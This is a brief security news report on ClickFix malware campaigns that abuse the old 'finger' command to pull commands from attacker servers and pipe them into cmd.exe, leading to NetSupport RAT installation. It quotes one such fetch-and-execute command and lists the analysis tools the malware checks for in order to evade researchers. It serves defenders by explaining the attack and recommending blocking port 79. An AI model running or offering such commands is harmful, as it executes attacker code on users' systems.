Skip to content
New ClickFix attacks reuse ancient 'finger' command

New ClickFix attacks reuse ancient 'finger' command

Scworld November 17, 2025

BleepingComputer reports that threat actors have revived the abuse of the decades-old "finger" command to facilitate remote command execution as part of new ClickFix malware attacks .

After identifying a batch file that exploited the "finger [email protected] [.]com" command to fetch commands that were then executed via cmd.exe, MalwareHunterTeam discovered a ClickFix campaign that harnessed the "finger [email protected] | cmd" command to execute commands akin to another campaign reported by a user.

Despite the similarities, the intrusion spotted by MalwareHunterTeam was noted to be more sophisticated due to the presence of commands that sought for malware research tools, including WinDump, filemon, Procmon, x64dbg, vmmap, processlasso, Fiddler, and Everywhere.

Absence of any malware analysis tools then prompts the loading of a PDF-spoofing ZIP archive, where the NetSupport Manager RAT package is extracted. Effectively combating the exploitation of the finger command requires the blocking of outgoing traffic to TCP port 79.